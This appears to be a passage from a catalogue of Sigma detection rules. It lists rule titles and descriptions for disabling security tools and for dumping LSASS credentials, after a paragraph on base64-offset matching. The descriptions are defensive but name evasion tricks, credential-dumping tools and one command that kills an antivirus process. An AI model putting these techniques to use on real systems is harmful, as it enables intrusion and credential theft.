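The alignment trick is what Sigma expresses with the `base64offset|contains` modifier (and `utf16le|base64offset|contains` for the UTF-16LE form that -EncodedCommand uses): base64 maps 3 bytes to 4 characters, so a keyword has three different encodings depending on its byte offset, and matching a single base64 of the keyword misses two thirds of the cases. Decoding the -EncodedCommand blob recovers the script text for the plaintext checks, but a script fed through stdin, clip.exe, a file or an environment variable, as in the Invoke-Obfuscation launchers listed above, leaves no such blob on the command line and needs script block logging instead.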
attack.t1562.001 113
Show Rules (113)
  • PowerShell AMSI Bypass Pattern - Level: high
    Description: Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload.
  • Stop Or Remove Antivirus Service - Level: high
    Description: Detects usage of the 'Stop-Service' or 'Remove-Service' PowerShell cmdlets to disable AV services. Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping the antivirus service
  • Suspicious Execution of Sc to Delete AV Services - Level: high
    Description: Detects when attackers use "sc.exe" to delete AV services from the system in order to avoid detection
  • Disable Microsoft Office Security Features - Level: high
    Description: Detects the disabling of Microsoft Office security features via the registry
  • Windows Defender Threat Detection Disabled - Level: high
    Description: Detects disabling Windows Defender threat protection
  • AWS CloudTrail Important Change - Level: medium
    Description: Detects disabling, deleting and updating of a Trail
  • AWS Config Disabling Channel/Recorder - Level: high
    Description: Detects AWS Config Service disabling
  • AWS GuardDuty Important Change - Level: high
    Description: Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.
  • Azure Kubernetes Events Deleted - Level: medium
    Description: Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.
  • Bitbucket Global Secret Scanning Rule Deleted - Level: medium
    Description: Detects Bitbucket global secret scanning rule deletion activity.
  • Bitbucket Global SSH Settings Changed - Level: medium
    Description: Detects Bitbucket global SSH access configuration changes.
  • Bitbucket Audit Log Configuration Updated - Level: medium
    Description: Detects changes to the bitbucket audit log configuration.
  • Bitbucket Project Secret Scanning Allowlist Added - Level: low
    Description: Detects when a secret scanning allowlist rule is added for projects.
  • Bitbucket Secret Scanning Exempt Repository Added - Level: high
    Description: Detects when a repository is exempted from secret scanning feature.
  • Bitbucket Secret Scanning Rule Deleted - Level: low
    Description: Detects when secret scanning rule is deleted for the project or repository.
  • Github Push Protection Bypass Detected - Level: low
    Description: Detects when a user bypasses the push protection on a secret detected by secret scanning.
  • Github Push Protection Disabled - Level: high
    Description: Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules.
  • Github Secret Scanning Feature Disabled - Level: high
    Description: Detects if the secret scanning feature is disabled for an enterprise or repository.
  • ESXi Syslog Configuration Change Via ESXCLI - Level: medium
    Description: Detects changes to the ESXi syslog configuration via "esxcli"
  • Disable Security Tools - Level: medium
    Description: Detects the disabling of security tools
  • Cisco Disabling Logging - Level: high
    Description: Detects logging being turned off, locally or remotely
  • Microsoft Malware Protection Engine Crash - Level: high
    Description: This rule detects a suspicious crash of the Microsoft Malware Protection Engine
  • Microsoft Malware Protection Engine Crash - WER - Level: high
    Description: This rule detects a suspicious crash of the Microsoft Malware Protection Engine
  • Weak Encryption Enabled and Kerberoast - Level: high
    Description: Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.
  • NetNTLM Downgrade Attack - Level: high
    Description: Detects NetNTLM downgrade attack
  • Potential Privileged System Service Operation - SeLoadDriverPrivilege - Level: medium
    Description: Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code into kernel mode. This user right does not apply to Plug and Play device drivers. If you exclude privileged users/admins and processes which are allowed to do so, you may be left with bad programs trying to load malicious kernel drivers. This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools, so you have to work with an allowlist to find the bad stuff.
  • Windows Defender Exclusion List Modified - Level: medium
    Description: Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.
  • Windows Defender Exclusion Deleted - Level: medium
    Description: Detects when a Windows Defender exclusion has been deleted. This could indicate an attacker trying to delete their tracks by removing the added exclusions
  • Windows Defender Exclusion Registry Key - Write Access Requested - Level: medium
    Description: Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security.
  • Windows Defender Threat Detection Service Disabled - Level: medium
    Description: Detects when the "Windows Defender Threat Protection" service is disabled.
  • Windows Defender Grace Period Expired - Level: high
    Description: Detects the expiration of the grace period of Windows Defender. This means protection against viruses, spyware, and other potentially unwanted software is disabled.
  • Windows Defender Exclusions Added - Level: medium
    Description: Detects the Setting of Windows Defender Exclusions
  • Windows Defender Exploit Guard Tamper - Level: high
    Description: Detects when someone is adding or removing applications or folders from exploit guard "ProtectedFolders" or "AllowedApplications"
  • Windows Defender Submit Sample Feature Disabled - Level: low
    Description: Detects disabling of the "Automatic Sample Submission" feature of Windows Defender.
  • Windows Defender Malware And PUA Scanning Disabled - Level: high
    Description: Detects disabling of the Windows Defender feature of scanning for malware and other potentially unwanted software
  • Windows Defender Real-time Protection Disabled - Level: high
    Description: Detects disabling of Windows Defender Real-time Protection. As this event doesn't contain a lot of information on who initiated this action you might want to reduce it to a "medium" level if this occurs too many times in your environment
  • Windows Defender Real-Time Protection Failure/Restart - Level: medium
    Description: Detects issues with Windows Defender Real-Time Protection features
  • Win Defender Restored Quarantine File - Level: high
    Description: Detects the restoration of files from the defender quarantine
  • Windows Defender Configuration Changes - Level: high
    Description: Detects suspicious changes to the Windows Defender configuration
  • Microsoft Defender Tamper Protection Trigger - Level: high
    Description: Detects blocked attempts to change any of Defender's settings such as "Real Time Monitoring" and "Behavior Monitoring"
  • Windows Defender Virus Scanning Feature Disabled - Level: high
    Description: Detects disabling of the Windows Defender virus scanning feature
  • Suspicious PROCEXP152.sys File Created In TMP - Level: medium
    Description: Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.
  • Load Of RstrtMgr.DLL By A Suspicious Process - Level: high
    Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shutting down specific processes.
  • Load Of RstrtMgr.DLL By An Uncommon Process - Level: low
    Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shutting down specific processes.
  • Tamper Windows Defender - PSClassic - Level: high
    Description: Detects attempts to disable scheduled scanning and other parts of Windows Defender ATP or to set default actions to allow.
  • AMSI Bypass Pattern Assembly GetType - Level: high
    Description: Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts
  • Potential AMSI Bypass Script Using NULL Bits - Level: medium
    Description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities
  • Disable-WindowsOptionalFeature Command PowerShell - Level: high
    Description: Detects use of the built-in PowerShell cmdlet Disable-WindowsOptionalFeature, part of the Deployment Image Servicing and Management (DISM) tooling. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
  • Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging - Level: high
    Description: Detects attempts to remove Windows Defender configuration using the 'MpPreference' cmdlet
  • Tamper Windows Defender - ScriptBlockLogging - Level: high
    Description: Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.
  • HackTool - CobaltStrike BOF Injection Pattern - Level: high
    Description: Detects a typical pattern of a CobaltStrike BOF which inject into other processes
  • Dism Remove Online Package - Level: medium
    Description: Detects removal of an online package via DISM (Deployment Image Servicing and Management). DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
  • HackTool - PowerTool Execution - Level: high
    Description: Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files
  • HackTool - Stracciatella Execution - Level: high
    Description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.
  • Suspicious Windows Trace ETW Session Tamper Via Logman.EXE - Level: high
    Description: Detects the execution of "logman" utility in order to disable or delete Windows trace sessions
  • Windows Defender Definition Files Removed - Level: high
    Description: Detects the removal of Windows Defender definition files. Adversaries may disable security tools to avoid possible detection of their tools and activities by removing these files
  • Potential AMSI Bypass Via .NET Reflection - Level: high
    Description: Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning
  • Potential AMSI Bypass Using NULL Bits - Level: medium
    Description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities
  • Powershell Base64 Encoded MpPreference Cmdlet - Level: high
    Description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modify or tamper with Windows Defender AV
  • Powershell Defender Disable Scan Feature - Level: high
    Description: Detects requests to disable Microsoft Defender features using PowerShell commands
  • Powershell Defender Exclusion - Level: medium
    Description: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
  • Disable Windows Defender AV Security Monitoring - Level: high
    Description: Detects attackers attempting to disable Windows Defender using Powershell
  • Disabled IE Security Features - Level: high
    Description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features
  • Obfuscated PowerShell OneLiner Execution - Level: high
    Description: Detects the execution of a specific OneLiner to download and execute powershell modules in memory.
  • Tamper Windows Defender Remove-MpPreference - Level: high
    Description: Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet
  • Service StartupType Change Via PowerShell Set-Service - Level: medium
    Description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"
  • PUA - CleanWipe Execution - Level: high
    Description: Detects the use of CleanWipe, a tool usually used to delete Symantec antivirus.
  • Python Function Execution Security Warning Disabled In Excel - Level: high
    Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
  • Add SafeBoot Keys Via Reg Utility - Level: high
    Description: Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attackers to allow ransomware to work in safe mode, where some security products do not.
  • SafeBoot Registry Key Deleted Via Reg.EXE - Level: high
    Description: Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attackers to prevent safe boot execution of security products.
  • Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE - Level: medium
    Description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.
  • Service Registry Key Deleted Via Reg.EXE - Level: high
    Description: Detects execution of "reg.exe" commands with the "delete" flag on service registry keys. Often used by attackers to remove AV software services.
  • Security Service Disabled Via Reg.EXE - Level: high
    Description: Detects execution of "reg.exe" to disable security services such as Windows Defender.
  • Reg Add Suspicious Paths - Level: high
    Description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys
  • Disabled Volume Snapshots - Level: high
    Description: Detects commands that temporarily turn off Volume Snapshots
  • Suspicious Windows Defender Registry Key Tampering Via Reg.EXE - Level: high
    Description: Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection
  • Service StartupType Change Via Sc.EXE - Level: medium
    Description: Detects the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"
  • Raccine Uninstall - Level: high
    Description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
  • Suspicious Windows Service Tampering - Level: high
    Description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts
  • Sysinternals PsSuspend Suspicious Execution - Level: high
    Description: Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses
  • Sysmon Configuration Update - Level: medium
    Description: Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare-bones one to avoid monitoring without shutting down the service completely
  • Uninstall Sysinternals Sysmon - Level: high
    Description: Detects the removal of Sysmon, which could be a potential attempt at defense evasion
  • Taskkill Symantec Endpoint Protection - Level: high
    Description: Detects one of the possible scenarios for disabling Symantec Endpoint Protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY\SYSTEM user can execute the "taskkill /im ccSvcHst.exe /f" command several times, thereby killing the process belonging to the service and thus shutting down the service.
  • Uninstall Crowdstrike Falcon Sensor - Level: high
    Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon
  • Potential Tampering With Security Products Via WMIC - Level: high
    Description: Detects uninstallation or termination of security products using the WMIC utility
  • Folder Removed From Exploit Guard ProtectedFolders List - Registry - Level: high
    Description: Detects the removal of folders from the "ProtectedFolders" list of Exploit Guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder
  • Removal Of AMSI Provider Registry Keys - Level: high
    Description: Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.
  • Disable Security Events Logging Adding Reg Key MiniNt - Level: high
    Description: Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, the Windows Event Log service will stop writing events.
  • NetNTLM Downgrade Attack - Registry - Level: high
    Description: Detects NetNTLM downgrade attack
  • Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback - Level: medium
    Description: Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.
  • Potential AMSI COM Server Hijacking - Level: high
    Description: Detects changes to the AMSI COM server registry key in order to disable AMSI scanning functionalities. When AMSI attempts to start its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless
  • Sysmon Driver Altitude Change - Level: high
    Description: Detects changes in Sysmon driver altitude value. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.
  • Windows Defender Exclusions Added - Registry - Level: medium
    Description: Detects the Setting of Windows Defender Exclusions
  • Antivirus Filter Driver Disallowed On Dev Drive - Registry - Level: high
    Description: Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive".
  • Hypervisor Enforced Code Integrity Disabled - Level: high
    Description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel
  • Hypervisor Enforced Paging Translation Disabled - Level: high
    Description: Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value where it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature.
  • Disable Exploit Guard Network Protection on Windows Defender - Level: medium
    Description: Detects disabling Windows Defender Exploit Guard Network Protection
  • Disabled Windows Defender Eventlog - Level: high
    Description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections
  • Disable PUA Protection on Windows Defender - Level: high
    Description: Detects disabling Windows Defender PUA protection
  • Disable Tamper Protection on Windows Defender - Level: medium
    Description: Detects disabling Windows Defender Tamper Protection
  • Disable Privacy Settings Experience in Registry - Level: medium
    Description: Detects registry modifications that disable Privacy Settings Experience
  • Windows Defender Service Disabled - Registry - Level: high
    Description: Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry
  • Scripted Diagnostics Turn Off Check Enabled - Registry - Level: medium
    Description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability
  • Suspicious Application Allowed Through Exploit Guard - Level: high
    Description: Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings
  • Uncommon Extension In Keyboard Layout IME File Registry Value - Level: high
    Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
  • Suspicious Path In Keyboard Layout IME File Registry Value - Level: high
    Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
  • Microsoft Office Protected View Disabled - Level: high
    Description: Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.
  • Python Function Execution Security Warning Disabled In Excel - Registry - Level: high
    Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
  • Tamper With Sophos AV Registry Keys - Level: high
    Description: Detects tamper attempts on Sophos AV functionality via registry key modification
  • Suspicious Service Installed - Level: medium
    Description: Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)
  • Disable Windows Defender Functionalities Via Registry Keys - Level: high
    Description: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry
  • Potential Ke3chang/TidePool Malware Activity - Level: high
    Description: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020
  • AWS Macie Evasion - Level: medium
    Description: Detects attempts to evade Macie detection.
attack.t1003.001 82
  • Credential Dumping Tools Service Execution - Level: critical
    Description: Detects well-known credential dumping tools execution via service execution events
  • CrackMapExec File Creation Patterns - Level: high
    Description: Detects suspicious file creation patterns found in logs when CrackMapExec is used
  • LSASS Memory Dump File Creation - Level: high
    Description: LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified
  • CreateMiniDump Hacktool - Level: high
    Description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine
  • Credential Dumping by LaZagne - Level: critical
    Description: Detects LSASS process access by LaZagne for credential dumping.
  • Credential Dumping Tools Accessing LSASS Memory - Level: high
    Description: Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools
  • Credential Dumping by Pypykatz - Level: critical
    Description: Detects LSASS process access by pypykatz for credential dumping.
  • Process Memory Dumped Via RdrLeakDiag.EXE - Level: high
    Description: Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory
  • Accessing WinAPI in PowerShell for Credentials Dumping - Level: high
    Description: Detects PowerShell accessing lsass.exe
  • Antivirus Password Dumper Detection - Level: critical
    Description: Detects a highly relevant Antivirus alert that reports a password dumper. This event must not be ignored just because the AV has blocked the malware; investigate how it came there in the first place.
  • Transferring Files with Credential Data via Network Shares - Zeek - Level: medium
    Description: Transferring files with well-known filenames (sensitive files with credential data) using network shares
  • Mimikatz Use - Level: high
    Description: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz versions that are however still used by different threat groups)
  • Potential Credential Dumping Via WER - Application - Level: high
    Description: Detects a Windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credentials
  • LSASS Access From Non System Account - Level: medium
    Description: Detects potential mimikatz-like tools accessing LSASS from non system account
  • Credential Dumping Tools Service Execution - Security - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Password Dumper Activity on LSASS - Level: high
    Description: Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN
  • Potentially Suspicious AccessMask Requested From LSASS - Level: medium
    Description: Detects process handle on LSASS process with certain access mask
  • Transferring Files with Credential Data via Network Shares - Level: medium
    Description: Transferring files with well-known filenames (sensitive files with credential data) using network shares
  • Credential Dumping Tools Service Execution - System - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • LSASS Access Detected via Attack Surface Reduction - Level: high
    Description: Detects Access to LSASS Process
  • Potential Credential Dumping Attempt Via PowerShell Remote Thread - Level: high
    Description: Detects remote thread creation by PowerShell processes into "lsass.exe"
  • Password Dumper Remote Thread in LSASS - Level: high
    Description: Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events.
  • Cred Dump Tools Dropped Files - Level: high
    Description: Detects creation of files with well-known filenames (parts of credential dump software or files produced by them)
  • HackTool - CrackMapExec File Indicators - Level: high
    Description: Detects file creation events with filename patterns used by CrackMapExec.
  • HackTool - Dumpert Process Dumper Default File - Level: critical
    Description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
  • HackTool - SafetyKatz Dump Indicator - Level: high
    Description: Detects default lsass dump filename generated by SafetyKatz.
  • LSASS Process Memory Dump Files - Level: high
    Description: Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.
  • LSASS Process Dump Artefact In CrashDumps Folder - Level: high
    Description: Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.
  • WerFault LSASS Process Memory Dump - Level: high
    Description: Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials
  • LSASS Process Memory Dump Creation Via Taskmgr.EXE - Level: high
    Description: Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.
  • Suspicious Renamed Comsvcs DLL Loaded By Rundll32 - Level: high
    Description: Detects rundll32 loading a renamed comsvcs.dll to dump process memory
  • Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded - Level: high
    Description: Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes. Tools like ProcessHacker and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.
  • Time Travel Debugging Utility Usage - Image - Level: high
    Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
  • Unsigned Image Loaded Into LSASS Process - Level: medium
    Description: Detects loading of an unsigned image (DLL, EXE) into the LSASS process
  • HackTool - Credential Dumping Tools Named Pipe Created - Level: critical
    Description: Detects well-known credential dumping tools execution via specific named pipe creation
  • PowerShell Get-Process LSASS in ScriptBlock - Level: high
    Description: Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity
  • HackTool - Generic Process Access - Level: high
    Description: Detects process access requests from hacktool processes based on their default image name
  • HackTool - HandleKatz Duplicating LSASS Handle - Level: high
    Description: Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles
  • Lsass Memory Dump via Comsvcs DLL - Level: high
    Description: Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.
  • LSASS Memory Access by Tool With Dump Keyword In Name - Level: high
    Description: Detects LSASS process access requests from a source process with the "dump" keyword in its image name.
  • Potential Credential Dumping Activity Via LSASS - Level: medium
    Description: Detects process access requests to the LSASS process with specific call trace calls and access masks. This behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.
  • Credential Dumping Activity By Python Based Tool - Level: high
    Description: Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.
  • Remote LSASS Process Access Through Windows Remote Management - Level: high
    Description: Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.
  • Suspicious LSASS Access Via MalSecLogon - Level: high
    Description: Detects suspicious access to LSASS handle via a call trace to "seclogon.dll" with a suspicious access right.
  • Potentially Suspicious GrantedAccess Flags On LSASS - Level: medium
    Description: Detects process access requests to LSASS process with potentially suspicious access flags
  • Credential Dumping Attempt Via WerFault - Level: high
    Description: Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.
  • LSASS Access From Potentially White-Listed Processes - Level: high
    Description: Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference
  • Potential Adplus.EXE Abuse - Level: high
    Description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.
  • Process Access via TrolleyExpress Exclusion - Level: high
    Description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
  • CreateDump Process Dump - Level: high
    Description: Detects uses of the createdump.exe LOLOBIN utility to dump process memory
  • Potential Windows Defender AV Bypass Via Dump64.EXE Rename - Level: high
    Description: Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder. Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage.
  • DumpMinitool Execution - Level: medium
    Description: Detects the use of "DumpMinitool.exe", a tool that allows dumping process memory via "MiniDumpWriteDump"
  • Suspicious DumpMinitool Execution - Level: high
    Description: Detects suspicious ways to use the "DumpMinitool.exe" binary
  • HackTool - CrackMapExec Process Patterns - Level: high
    Description: Detects suspicious process patterns found in logs when CrackMapExec is used
  • HackTool - CreateMiniDump Execution - Level: high
    Description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine
  • HackTool - Dumpert Process Dumper Execution - Level: critical
    Description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory
  • HackTool - HandleKatz LSASS Dumper Execution - Level: high
    Description: Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same
  • HackTool - Inveigh Execution - Level: critical
    Description: Detects the use of Inveigh, a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
  • HackTool - Mimikatz Execution - Level: high
    Description: Detects well-known mimikatz command line arguments
  • HackTool - SafetyKatz Execution - Level: critical
    Description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name
  • HackTool - Windows Credential Editor (WCE) Execution - Level: critical
    Description: Detects the use of Windows Credential Editor (WCE)
  • HackTool - XORDump Execution - Level: high
    Description: Detects suspicious use of XORDump process memory dumping utility
  • Dumping Process via Sqldumper.exe - Level: medium
    Description: Detects process dump via legitimate sqldumper.exe binary
  • Time Travel Debugging Utility Usage - Level: high
    Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
  • Potential Credential Dumping Via LSASS Process Clone - Level: critical
    Description: Detects a suspicious LSASS process clone that could be a sign of credential dumping activity
  • Process Memory Dump via RdrLeakDiag.EXE - Level: high
    Description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory
  • Renamed CreateDump Utility Execution - Level: high
    Description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory
  • Process Memory Dump Via Comsvcs.DLL - Level: high
    Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
  • LSASS Dump Keyword In CommandLine - Level: high
    Description: Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.
  • Procdump Execution - Level: medium
    Description: Detects usage of the SysInternals Procdump utility
  • Potential SysInternals ProcDump Evasion - Level: high
    Description: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name
  • Potential LSASS Process Dump Via Procdump - Level: high
    Description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we are also able to catch cases in which the attacker has renamed the procdump executable.
  • Potential Credential Dumping Via WER - Level: high
    Description: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass
  • Windows Credential Editor Registry - Level: critical
    Description: Detects the use of Windows Credential Editor (WCE)
  • Potential Credential Dumping Via LSASS SilentProcessExit Technique - Level: critical
    Description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
  • Lsass Full Dump Request Via DumpType Registry Settings - Level: high
    Description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.
  • NotPetya Ransomware Activity - Level: critical
    Description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
  • APT31 Judgement Panda Activity - Level: critical
    Description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
  • Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process - Level: medium
    Description: Detects the load of dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process. The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL.
